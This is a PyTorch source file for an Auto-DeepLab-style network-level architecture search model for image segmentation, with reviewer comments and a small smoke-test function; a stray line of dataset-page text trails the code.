class Model_net_search (nn.Module) :
    """Auto-DeepLab-style network-level architecture search model.

    Maintains four parallel feature trellises at strides 4/8/16/32, each layer
    built from :class:`Cell_fixed` cells with a fixed (already searched) cell
    genotype, while the *network-level* path weights (``betas``) remain
    learnable architecture parameters.  ASPP heads at every stride produce
    per-class maps that are upsampled and summed.

    Args:
        num_classes: number of segmentation classes.
        num_layers: number of trellis layers (the beta tensor is sized for 12).
        args: hyper-parameter namespace; must provide ``sync_bn``, ``B``
            (blocks per cell) and ``F`` (filter multiplier).
        C_index: layers at which intermediate ASPP outputs are collected.
            NOTE(review): despite the int default (5), ``forward`` uses
            ``layer in self.C_index`` and ``len(self.C_index)`` — callers are
            expected to pass a collection of layer indices; confirm.
        alphas: cell genotype forwarded to each cell as its ``cell_arch``.
    """
    def __init__(self,
                num_classes,
                num_layers,
                args,
                C_index=5,
                alphas=None):
        super(Model_net_search, self).__init__()
        cell = Cell_fixed
        BatchNorm = SynchronizedBatchNorm2d if args.sync_bn == True else nn.BatchNorm2d
        self.cells = nn.ModuleList()
        self._num_layers = num_layers
        self._num_classes = num_classes
        self.C_index = C_index
        self._initialize_alphas_betas()
        self.alphas = alphas
        B = args.B
        # NOTE: local F (filter multiplier) shadows torch.nn.functional's F
        # inside __init__ only; forward() still sees the module-level F.
        F = args.F
        f_initial = F * B
        half_f_initial = int(f_initial / 2)
        FB = F * B
        # dense_preprocess[i][k] adapts layer i's stride-4/8/16/32 output down
        # to F*(2**k) channels so dense (cross-layer) skip inputs can be
        # concatenated cheaply in forward().  Early layers (0, 1) do not yet
        # have all strides, so lower-stride outputs are spatially reduced.
        self.dense_preprocess = nn.ModuleList()
        for i in range(self._num_layers-2):
            if i == 0:
                self.dense_preprocess.append(nn.ModuleList())
                self.dense_preprocess[0].append(ReLUConvBN(FB, F, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[0].append(ReLUConvBN(FB * 2, F * 2, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[0].append(FactorizedReduce(FB * 2, F * 4, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[0].append(DoubleFactorizedReduce(FB * 2, F * 8, BatchNorm=BatchNorm, affine=False))
            elif i == 1:
                self.dense_preprocess.append(nn.ModuleList())
                self.dense_preprocess[1].append(ReLUConvBN(FB, F, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[1].append(ReLUConvBN(FB * 2, F * 2, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[1].append(ReLUConvBN(FB * 4, F * 4, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[1].append(FactorizedReduce(FB * 4, F * 8, BatchNorm=BatchNorm, affine=False))
            else:
                self.dense_preprocess.append(nn.ModuleList())
                self.dense_preprocess[i].append(ReLUConvBN(FB, F, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[i].append(ReLUConvBN(FB * 2, F * 2, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[i].append(ReLUConvBN(FB * 4, F * 4, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
                self.dense_preprocess[i].append(ReLUConvBN(FB * 8, F * 8, 1, 1, 0, BatchNorm=BatchNorm, affine=False))
        # Two-stage stem: 3 -> F*B/2 (stride 2) -> F*B (stride 2) = stride 4.
        self.stem0 = nn.Sequential(
            nn.Conv2d(3, half_f_initial, 3, stride=2, padding=1, bias=False),
            BatchNorm(half_f_initial),
        )
        self.stem1 = nn.Sequential(
            nn.ReLU(),
            nn.Conv2d(half_f_initial, f_initial, 3, stride=2, padding=1, bias=False),
            BatchNorm(f_initial),
        )
        """ build the cells """
        # Layer i instantiates one cell per reachable stride; each cell takes
        # (prev_prev_C, C from coarser stride, same stride, finer stride).
        for i in range (self._num_layers):
            if i == 0 :
                cell1 = cell (B, half_f_initial,
                              None, f_initial, None,
                              F, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.5)
                cell2 = cell (B, half_f_initial,
                              f_initial, None, None,
                              F * 2, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.25)
                self.cells += [cell1]
                self.cells += [cell2]
            elif i == 1 :
                cell1 = cell (B, f_initial,
                              None, FB, FB * 2,
                              F, alphas, BatchNorm=BatchNorm)
                cell2 = cell (B, f_initial,
                              FB, FB * 2, None,
                              F * 2, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.5)
                cell3 = cell (B, f_initial,
                              FB * 2, None, None,
                              F * 4, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.25)
                self.cells += [cell1]
                self.cells += [cell2]
                self.cells += [cell3]
            elif i == 2 :
                cell1 = cell (B, FB,
                              None, FB, FB * 2,
                              F, alphas, BatchNorm=BatchNorm)
                cell2 = cell (B, FB * 2,
                              FB, FB * 2, FB * 4,
                              F * 2, alphas, BatchNorm=BatchNorm)
                cell3 = cell (B, FB * 2,
                              FB * 2, FB * 4, None,
                              F * 4, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.5)
                cell4 = cell (B, FB * 2,
                              FB * 4, None, None,
                              F * 8, alphas, BatchNorm=BatchNorm, pre_preprocess_sample_rate=0.25)
                self.cells += [cell1]
                self.cells += [cell2]
                self.cells += [cell3]
                self.cells += [cell4]
            else:
                # From layer 3 on, s0 is the dense concat of (i-1) skip inputs.
                cell1 = cell (B, F * (i-1),
                              None, FB, FB * 2,
                              F, alphas, BatchNorm=BatchNorm)
                cell2 = cell (B, F * (i-1) * 2,
                              FB, FB * 2, FB * 4,
                              F * 2, alphas, BatchNorm=BatchNorm)
                cell3 = cell (B, F * (i-1) * 4,
                              FB * 2, FB * 4, FB * 8,
                              F * 4, alphas, BatchNorm=BatchNorm)
                cell4 = cell (B, F * (i-1) * 8,
                              FB * 4, FB * 8, None,
                              F * 8, alphas, BatchNorm=BatchNorm)
                self.cells += [cell1]
                self.cells += [cell2]
                self.cells += [cell3]
                self.cells += [cell4]
        # One ASPP head per stride; dilation rates shrink as stride grows.
        self.aspp_4 = ASPP (FB, self._num_classes, 24, 24, BatchNorm=BatchNorm) #96 / 4 as in the paper
        self.aspp_8 = ASPP (FB * 2, self._num_classes, 12, 12, BatchNorm=BatchNorm) #96 / 8
        self.aspp_16 = ASPP (FB * 4, self._num_classes, 6, 6, BatchNorm=BatchNorm) #96 / 16
        self.aspp_32 = ASPP (FB * 8, self._num_classes, 3, 3, BatchNorm=BatchNorm) #96 / 32
        self._init_weight()
    def forward (self, x) :
        """Forward pass.

        Returns a list of full-resolution class-score maps: one summed
        4+8+16+32-stride prediction per collection point (each layer in
        ``C_index`` plus the final layer).
        """
        level_4 = []
        level_8 = []
        level_16 = []
        level_32 = []
        # Dense skip features (channel-reduced) accumulated across layers.
        level_4_dense = []
        level_8_dense = []
        level_16_dense = []
        level_32_dense = []
        # Intermediate ASPP outputs collected at C_index layers.
        C_output_4 = []
        C_output_8 = []
        C_output_16 = []
        C_output_32 = []
        temp = self.stem0(x)
        level_4.append (self.stem1(temp))
        count = 0
        # NOTE(review): allocated via randn but fully overwritten below;
        # .half() forces fp16 storage of the normalized betas — confirm this
        # interacts correctly with fp32 cell outputs under your AMP setup.
        normalized_betas = torch.randn(12, 4, 3).cuda().half()
        """ Softmax on betas """
        # betas[layer][stride] are the 3 path logits (down/same/up into that
        # stride).  Edge strides have fewer valid transitions, so partial
        # slices are softmaxed and rescaled by 2/3 to keep magnitudes comparable.
        for layer in range (len(self.betas)):
            if layer == 0:
                normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
            elif layer == 1:
                normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
                normalized_betas[layer][1] = F.softmax (self.betas[layer][1], dim=-1)
            elif layer == 2:
                normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
                normalized_betas[layer][1] = F.softmax (self.betas[layer][1], dim=-1)
                normalized_betas[layer][2] = F.softmax (self.betas[layer][2], dim=-1)
            else :
                normalized_betas[layer][0][1:] = F.softmax (self.betas[layer][0][1:], dim=-1) * (2/3)
                normalized_betas[layer][1] = F.softmax (self.betas[layer][1], dim=-1)
                normalized_betas[layer][2] = F.softmax (self.betas[layer][2], dim=-1)
                normalized_betas[layer][3][:2] = F.softmax (self.betas[layer][3][:2], dim=-1) * (2/3)
        for layer in range (self._num_layers) :
            # Each branch below wires one trellis layer: every stride's new
            # feature is the beta-weighted sum of the cell outputs reachable
            # from the finer, same, and coarser strides of the previous layer.
            if layer == 0 :
                level4_new, = self.cells[count] (temp, None, level_4[-1], None)
                count += 1
                level8_new, = self.cells[count] (temp, level_4[-1], None, None)
                count += 1
                level4_new = normalized_betas[layer][0][1] * level4_new
                level8_new = normalized_betas[layer][0][2] * level8_new
                level_4.append (level4_new)
                level_8.append (level8_new)
                del temp
                level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
                level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
                # Strides 16/32 don't exist yet: derive their dense skips by
                # reducing the stride-8 feature.
                level_16_dense.append(self.dense_preprocess[layer][2](level8_new))
                level_32_dense.append(self.dense_preprocess[layer][3](level8_new))
            elif layer == 1 :
                level4_new_1, level4_new_2 = self.cells[count] (level_4[-2],
                                                                None,
                                                                level_4[-1],
                                                                level_8[-1])
                level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
                count += 1
                level8_new_1, level8_new_2 = self.cells[count] (level_4[-2],
                                                                level_4[-1],
                                                                level_8[-1],
                                                                None)
                level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2
                count += 1
                level16_new, = self.cells[count] (level_4[-2],
                                                  level_8[-1],
                                                  None,
                                                  None)
                level16_new = normalized_betas[layer][1][2] * level16_new
                count += 1
                level_4.append (level4_new)
                level_8.append (level8_new)
                level_16.append (level16_new)
                level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
                level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
                level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
                # Stride 32 still absent: reduce the stride-16 feature instead.
                level_32_dense.append(self.dense_preprocess[layer][3](level16_new))
            elif layer == 2 :
                level4_new_1, level4_new_2 = self.cells[count] (level_4[-2],
                                                                None,
                                                                level_4[-1],
                                                                level_8[-1])
                count += 1
                level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
                level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (level_8[-2],
                                                                              level_4[-1],
                                                                              level_8[-1],
                                                                              level_16[-1])
                level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
                count += 1
                level16_new_1, level16_new_2 = self.cells[count] (level_8[-2],
                                                                  level_8[-1],
                                                                  level_16[-1],
                                                                  None)
                level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2
                count += 1
                level32_new, = self.cells[count] (level_8[-2],
                                                  level_16[-1],
                                                  None,
                                                  None)
                level32_new = normalized_betas[layer][2][2] * level32_new
                count += 1
                level_4.append (level4_new)
                level_8.append (level8_new)
                level_16.append (level16_new)
                level_32.append (level32_new)
                level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
                level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
                level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
                level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
                if 2 in self.C_index:
                    C_output_4.append(self.aspp_4(level_4[-1]))
                    C_output_8.append(self.aspp_8(level_8[-1]))
                    C_output_16.append(self.aspp_16(level_16[-1]))
                    C_output_32.append(self.aspp_32(level_32[-1]))
            elif layer == 3 :
                # From here on, s0 is the concat of all earlier dense skips
                # (excluding the most recent, which is already the s1 input).
                level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
                                                                None,
                                                                level_4[-1],
                                                                level_8[-1])
                level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
                count += 1
                level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
                                                                              level_4[-1],
                                                                              level_8[-1],
                                                                              level_16[-1])
                level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
                count += 1
                level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
                                                                                 level_8[-1],
                                                                                 level_16[-1],
                                                                                 level_32[-1])
                level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
                count += 1
                level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
                                                                  level_16[-1],
                                                                  level_32[-1],
                                                                  None)
                level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
                count += 1
                level_4.append (level4_new)
                level_8.append (level8_new)
                level_16.append (level16_new)
                level_32.append (level32_new)
                level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
                level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
                level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
                level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
                if 3 in self.C_index:
                    C_output_4.append(self.aspp_4(level_4[-1]))
                    C_output_8.append(self.aspp_8(level_8[-1]))
                    C_output_16.append(self.aspp_16(level_16[-1]))
                    C_output_32.append(self.aspp_32(level_32[-1]))
            elif layer not in self.C_index and layer < self._num_layers - 2:
                # Generic middle layer, no intermediate prediction collected.
                level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
                                                                None,
                                                                level_4[-1],
                                                                level_8[-1])
                level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
                count += 1
                level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
                                                                              level_4[-1],
                                                                              level_8[-1],
                                                                              level_16[-1])
                level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
                count += 1
                level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
                                                                                 level_8[-1],
                                                                                 level_16[-1],
                                                                                 level_32[-1])
                level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
                count += 1
                level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
                                                                  level_16[-1],
                                                                  level_32[-1],
                                                                  None)
                level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
                count += 1
                level_4.append (level4_new)
                level_8.append (level8_new)
                level_16.append (level16_new)
                level_32.append (level32_new)
                level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
                level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
                level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
                level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
            elif layer in self.C_index and layer < self._num_layers - 2:
                # Same as the generic middle layer, but also collects an
                # intermediate ASPP prediction at every stride.
                level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
                                                                None,
                                                                level_4[-1],
                                                                level_8[-1])
                level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
                count += 1
                level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
                                                                              level_4[-1],
                                                                              level_8[-1],
                                                                              level_16[-1])
                level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
                count += 1
                level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
                                                                                 level_8[-1],
                                                                                 level_16[-1],
                                                                                 level_32[-1])
                level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
                count += 1
                level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
                                                                  level_16[-1],
                                                                  level_32[-1],
                                                                  None)
                level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
                count += 1
                level_4.append (level4_new)
                level_8.append (level8_new)
                level_16.append (level16_new)
                level_32.append (level32_new)
                level_4_dense.append(self.dense_preprocess[layer][0](level4_new))
                level_8_dense.append(self.dense_preprocess[layer][1](level8_new))
                level_16_dense.append(self.dense_preprocess[layer][2](level16_new))
                level_32_dense.append(self.dense_preprocess[layer][3](level32_new))
                C_output_4.append(self.aspp_4(level_4[-1]))
                C_output_8.append(self.aspp_8(level_8[-1]))
                C_output_16.append(self.aspp_16(level_16[-1]))
                C_output_32.append(self.aspp_32(level_32[-1]))
            elif layer == self._num_layers-1:
                # Final layer: consume the full dense skip history; no new
                # dense features are produced.
                level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense, dim=1),
                                                                None,
                                                                level_4[-1],
                                                                level_8[-1])
                level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
                count += 1
                level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense, dim=1),
                                                                              level_4[-1],
                                                                              level_8[-1],
                                                                              level_16[-1])
                level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
                count += 1
                level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense, dim=1),
                                                                                 level_8[-1],
                                                                                 level_16[-1],
                                                                                 level_32[-1])
                level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
                count += 1
                level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense, dim=1),
                                                                  level_16[-1],
                                                                  level_32[-1],
                                                                  None)
                level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
                count += 1
                level_4.append (level4_new)
                level_8.append (level8_new)
                level_16.append (level16_new)
                level_32.append (level32_new)
            else :
                # Second-to-last layer: uses dense skips but stops growing them.
                level4_new_1, level4_new_2 = self.cells[count] (torch.cat(level_4_dense[:-1], dim=1),
                                                                None,
                                                                level_4[-1],
                                                                level_8[-1])
                level4_new = normalized_betas[layer][0][1] * level4_new_1 + normalized_betas[layer][1][0] * level4_new_2
                count += 1
                level8_new_1, level8_new_2, level8_new_3 = self.cells[count] (torch.cat(level_8_dense[:-1], dim=1),
                                                                              level_4[-1],
                                                                              level_8[-1],
                                                                              level_16[-1])
                level8_new = normalized_betas[layer][0][2] * level8_new_1 + normalized_betas[layer][1][1] * level8_new_2 + normalized_betas[layer][2][0] * level8_new_3
                count += 1
                level16_new_1, level16_new_2, level16_new_3 = self.cells[count] (torch.cat(level_16_dense[:-1], dim=1),
                                                                                 level_8[-1],
                                                                                 level_16[-1],
                                                                                 level_32[-1])
                level16_new = normalized_betas[layer][1][2] * level16_new_1 + normalized_betas[layer][2][1] * level16_new_2 + normalized_betas[layer][3][0] * level16_new_3
                count += 1
                level32_new_1, level32_new_2 = self.cells[count] (torch.cat(level_32_dense[:-1], dim=1),
                                                                  level_16[-1],
                                                                  level_32[-1],
                                                                  None)
                level32_new = normalized_betas[layer][2][2] * level32_new_1 + normalized_betas[layer][3][1] * level32_new_2
                count += 1
                level_4.append (level4_new)
                level_8.append (level8_new)
                level_16.append (level16_new)
                level_32.append (level32_new)
            # Prune history to bound memory: early layers keep two entries
            # (cells still need prev_prev via the raw lists), later layers one.
            if layer < 3:
                level_4 = level_4[-2:]
                level_8 = level_8[-2:]
                level_16 = level_16[-2:]
                level_32 = level_32[-2:]
            else:
                level_4 = level_4[-1:]
                level_8 = level_8[-1:]
                level_16 = level_16[-1:]
                level_32 = level_32[-1:]
        # Final prediction from the last layer's features at every stride.
        C_output_4.append(self.aspp_4(level_4[-1]))
        C_output_8.append(self.aspp_8(level_8[-1]))
        C_output_16.append(self.aspp_16(level_16[-1]))
        C_output_32.append(self.aspp_32(level_32[-1]))
        C_sum_maps = []
        upsample = nn.Upsample(size=x.size()[2:], mode='bilinear', align_corners=True)
        # Upsample each collected prediction to input resolution and sum over strides.
        for c in range(len(self.C_index) +1):
            C_output_4[c] = upsample(C_output_4[c])
            C_output_8[c] = upsample(C_output_8[c])
            C_output_16[c] = upsample(C_output_16[c])
            C_output_32[c] = upsample(C_output_32[c])
            C_sum_maps.append(C_output_4[c] + C_output_8[c] + C_output_16[c] + C_output_32[c])
        return C_sum_maps
    def _init_weight(self):
        # Kaiming init for convs; unit-gamma/zero-beta for affine batch norms.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                torch.nn.init.kaiming_normal_(m.weight)
            elif isinstance(m, SynchronizedBatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.BatchNorm2d):
                if m.affine != False:
                    m.weight.data.fill_(1)
                    m.bias.data.zero_()
    def _initialize_alphas_betas(self):
        # Despite the name, only the network-level betas are created here;
        # cell-level alphas are supplied by the caller.  Shape (12, 4, 3):
        # (layer, stride-level, incoming-path).  Requires a CUDA device.
        betas = torch.tensor (1e-3*torch.randn(12, 4, 3).cuda(), requires_grad=True)
        self._arch_parameters = [betas]
        self._arch_param_names = ['betas']
        [self.register_parameter(name, torch.nn.Parameter(param)) for name, param in zip(self._arch_param_names, self._arch_parameters)]
    def arch_parameters (self) :
        # Architecture (beta) parameters, e.g. for a separate optimizer.
        return [param for name, param in self.named_parameters() if name in self._arch_param_names]
    def weight_parameters(self):
        # All remaining (network weight) parameters.
        return [param for name, param in self.named_parameters() if name not in self._arch_param_names]
def main () :
    """Smoke test: build the search model and a dummy input batch.

    Fixes vs. the previous version: the class is ``Model_net_search`` (the
    old ``Model_search`` name raised ``NameError``), the model needs an args
    object providing ``sync_bn``/``B``/``F`` (``None`` crashed on attribute
    access), and ``torch.tensor(torch.ones(...))`` is replaced by the direct
    constructor (the old form triggers a copy-construct warning).

    Note: instantiating the model requires a CUDA device, because the
    architecture parameters are created on the GPU in
    ``_initialize_alphas_betas``.
    """
    from types import SimpleNamespace
    # Minimal hyper-parameter container matching what __init__ reads.
    args = SimpleNamespace(sync_bn=False, B=5, F=8)
    model = Model_net_search (7, 12, args)
    x = torch.ones (4, 3, 224, 224)

if __name__ == '__main__' :
    main ()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.